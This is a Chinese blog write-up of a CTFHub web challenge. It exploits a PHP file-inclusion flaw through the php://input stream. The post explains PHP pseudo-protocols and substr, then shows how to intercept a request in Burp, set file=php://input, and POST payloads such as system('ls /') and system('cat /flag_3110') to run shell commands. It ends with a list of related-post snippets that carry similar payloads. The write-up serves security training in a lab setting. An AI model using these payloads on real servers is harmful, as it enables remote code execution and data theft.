CTFHUB-技能树-Web题-RCE(远程代码执行)-文件包含-php://input

最新推荐文章于 2025-10-11 22:16:50 发布
原创 最新推荐文章于 2025-10-11 22:16:50 发布 · 905 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #开发语言

CTFHUB-技能树-Web题-RCE(远程代码执行)-文件包含-php://input

文章目录

前置知识—php伪协议
php支持的伪协议
1 file:// — 访问本地文件系统
2 http:// — 访问 HTTP(s) 网址
3 ftp:// — 访问 FTP(s) URLs
4 php:// — 访问各个输入/输出流(I/O streams)
5 zlib:// — 压缩流
6 data:// — 数据(RFC 2397)
7 glob:// — 查找匹配的文件路径模式
8 phar:// — PHP 归档
9 ssh2:// — Secure Shell 2
10 rar:// — RAR
11 ogg:// — 音频流
12 expect:// — 处理交互式的流

php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。

php伪协议详解

php伪协议总结

文件包含—php://input

做题前先了解substr函数

函数语法:

substr(string,start,length)

参数介绍:

  • string 必需。规定要返回其中一部分的字符串。
  • start 必需。规定在字符串的何处开始。

正数 - 在字符串的指定位置开始

负数 - 在从字符串结尾的指定位置开始

0 - 在字符串中的第一个字符处开始

  • length 可选。规定要返回的字符串长度。默认是直到字符串的结尾。

正数 - 从 start 参数所在的位置返回

负数 - 从字符串末端返回

解题方法:

观察代码

在这里插入图片描述

代码中说如果file 名中六个字符是 “php://” 就执行后面的include函数

这里其实就应该想到的是php://伪协议

php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。

而执行php://input伪协议条件是allow_url_include是On

查看phpinfo发现时allow_url_include是On

url?file=php://phpinfo

在这里插入图片描述

在这里插入图片描述

说明可以使用php://input伪协议

那么我们就开始做题

用brup抓包,放入重放器中

直接构造

file的值为php://input
也就是 ?file=php://input

post参数为

<?php system("ls")?>

因为php://input是执行后面的PHP命令所以要写成php代码形式

在这里插入图片描述

直接访问根目录

(也可以一级一级目录找 
<?php system("ls ../")?>
<?php system("ls ../../")?>
)

,寻找flag

<?php system("ls /")?>

在这里插入图片描述

查看flag

system("cat /flag_3110")?>

在这里插入图片描述

ctfhub-RCE-文件包含 ,php://input,远程包含​,​ 读取源代码, 命令注入,过滤cat,过滤空格,过滤目录分隔符,过滤运算符,综合过滤练习
weixin_55702959的博客
02-02 4367
目录 文件包含 php://input php://input伪协议 远程包含 ​​ 读取源代码 命令注入 过滤cat 过滤空格 过滤目录分隔符 过滤运算符 综合过滤练习 文件包含 打开目发现代码中有shell.txt直接点击shell打开在post发现是没用的,于是换个方式在?file=shell.txt 进行post php://input php:// 输入输出流 PHP 提供了一些杂项输入/输出(IO)流,允许访问...
ctfhub--ctf--web--RCE(1.eval执行2.文件包含3.常见伪协议用法4.php://input5.远程包含6.读取源代)
feiniaotjx的博客
10-05 731
RCE1.eval执行2.文件包含3.php://input 1.eval执行 request接受post和get请求,接受cmd参数 使用远程系统命令遍历目录 查看文件 2.文件包含 需要传一个file参数,不能为flag,存在shell.txt,可连接shell,故可以访问?file=shell.txt 之后post提交ctfhub=system('cat /flag');查看flag 3.php://input ...
substr(php函数)
zunguitiancheng的专栏
03-31 582
http://baike.baidu.com/subview/1827482/5080396.htm                1.定义和用法              2.语法 3.参数 1.定义和用法编辑 substr() 函数返回字符串的一部分。 如果 start 参数是负数且 length 小于或等于 start,则 length 为 0。 2.语法编辑
CTFHub-RCE中的PHP://input思路
最新发布
y07xiao的博客
10-11 375
php://inputPHP提供的一个伪协议,允许开发者访问 POST 请求的原始内容,它是一个只读流,可以直接读取原始的 POST 数据,而不需要依赖特定的全局变量。响应了空白说明还没有php参数,如果报错了则是服务器可能不支持PHP://input。这样就找到了flag,再次构造一个PHP(使用cat查看flag)用到的工具有burpsuite,火狐浏览器。现在来构造一个php包,直接去找根目录。点击Forward发送,靶机会显示。首先检查确认一下漏洞和配置。这样就找到了flag。
php 去掉字符串的最后一个字符
蔡先生的专栏
10-10 6796
原字符串1,2,3,4,5,6, 去掉最后一个字符",",最终结果为1,2,3,4,5,6  代码如下:  $str = "1,2,3,4,5,6,"; $newstr = substr($str,0,strlen($str)-1); echo $newstr; //echo 1,2,3,4,5,6 系统自带的函数即可实现这样的效果,两种方法:  sub
CTFHUB-技能树-Web-RCE远程代码执行-文件包含php://input—读取源代码
Static______的博客
06-28 540
而且也没有木马文件可以用,但是它说flag在 /flag当中。而它说flag在 /flag当中那么我们直接。file的前六个字母要是php://
php字符串删除最后一位,php如何删除字符串最后一个字符
weixin_39572972的博客
03-10 258
php删除字符串最后一个字符的方法:1、使用rtrim函数删除字符串末端的空白字符;2、通过substr函数返回字符串的子串,并实现删除最后一个字符即可。PHP删除字符串最后一个字符通常在存多个有效值的时候(如:关键字,标签等),需要对存储的值进行分隔符处理,这样处理后通常会在字符串的首端或末端多一个分隔符,这是就需要对字符串进行处理删除首端或末端的分隔符。方法一:rtrim — 删除字符串末端的...
CTFHUB--RCE--文件包含
qq_75120258的博客
03-02 1229
有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。当它与包含函数结合时,php://filter经常会被当作代码呗执行,所以我们通常会对他进行BASE64编码。file=php://filter/resource=/flag 得到flag。php:// — 访问各个输入/输出流(I/O streams)data://text/plain 任意代码执行。zlib:// — 压缩流。
解记录-CTFHub技能树|Web|RCE
weixin_57448435的博客
09-15 1309
RCE漏洞,Hackbar插件的使用,cmd命令,运算符、空格、关键字flag、cat。
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7974
Web 目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
php去掉字符串的最后一个字符substr()
万里船的专栏
03-24 879
去掉字符串中的最后一个字符  原字符串1,2,3,4,5,6,  去掉最后一个字符",",最终结果为1,2,3,4,5,6  代码如下:  复制代码 代码如下: $str = "1,2,3,4,5,6,";  $newstr = substr($str,0,strlen($str)-1); echo $newstr;  系统自带的函数也可实现这样的效果,两种方法:
php去掉字符串的最后一个字符
分享干货,拒绝水文
01-10 411
在一个站长的空间看到这样的文章,觉得会有用,先记录下来原字符串1,2,3,4,5,6, 去掉最后一个字符",",最终结果为1,2,3,4,5,6 代码如下: $str = "1,2,3,4,5,6,"; $newstr = substr($str,0,strlen($str)-1); echo $newstr; //echo 1,2,3,4,5,6系统自带的函数即可实现这样的效果,两种方法: su
CTFHub技能树web(持续更新)--RCE--文件包含--php://input
jiuyongpinyin的博客
01-25 1202
php://input 做了两道才知道自己对于文件包含这里完全没有什么思路,所以还是参考了大神的链接 大神链接:点我看大神链接 这道打开的目页: 代码的意思是检验在url的get传参中有没有file这个参数,如果有,从第0位开始,长度必须为6的参数值必须是php://(不知道我这么说,说的清不清楚),符合条件就传入,不符合就返回Hacker。 所以参考了大神链接后,get传入参数flie=php://input: [外链图片转存中…(img-z6pUNpjh-1611544235748)] yo
php函数去除最后一个字符,PHP如何去除字符串中的最后一个字符?
weixin_42546508的博客
04-14 394
PHP如何去除字符串中的最后一个字符?这篇文章为大家讲解的是PHP如何去掉字符串的最后一个字符的多种方法,感兴趣的同学参考下。下面来一起看看。假设一个字符串,最后有一个逗号字符","去掉,有四种方法, 直接看代码://PHP去除字符串中的最后一个字符$str = "aaaa,bbb,ccc,ddd,eee,";echo rtrim($str,','); //第一种方法 trim($str,$chs...
CTFHub | php://input
尼泊罗河伯的博客
06-08 2346
简单分析网页显示内容中的源代码,判断如果参数以 php:// 开头,那么执行 include 函数将参数值作为文件包含进来。否则,输出字符串 Hacker!!! 。
php 去掉最后一个字符
一只想成为斗战圣佛的小猴子
05-07 1007
去掉最后一个字符
CTFhub-RCE-php://input
ssss39的博客
11-13 601
1. 使用Burpsuite抓包并转至Repeater。我们需要使用php://input来构造发送的指令。证明是可以使用php://input。3. 使用cat访问flag_xxx。查看phpinfo,找到一下字段。
php 字符串去掉最后一个元素,PHP去除最后一个字符的函数是什么?
weixin_30095833的博客
03-16 261
系统自带的函数也可实现这样的效果,两种方法:1) substr($str, 0, -1)2)rtrim($str, ",")substr取部份字符串。语法: string substr(string string,int start, int [length]);返回值: 字符串函数种类: 资料处理内容说明本函数将字符串string 的第 start 位起的字符串取出 length 个字符。若 s...
php去除最后一位,php字符串怎么去除最后一个字符
weixin_30479445的博客
03-16 561
去除方法:1、使用“substr($arr_str,0,strlen($arr_str)-1)”语句去除;2、使用“substr($arr_str, 0, -1) ”语句去除;3、使用“rtrim($arr_str, ",")”语句去除。本教程操作环境:windows7系统、PHP7.1版,DELL G3电脑PHP中删除最后一位字符的方法总结:方法一:substr($arr_str,0,strle...
CTFHUB----web前置技能-rce
01-01
### CTFHUB Web 前置技能 RCE 挑战及解思路 #### 远程命令执行简介 远程命令执行(Remote Command Execution, RCE),是指攻击者能够通过应用程序接口发送特定指令,在服务器端执行任意操作系统级别的命令。这种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

python炒粉

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值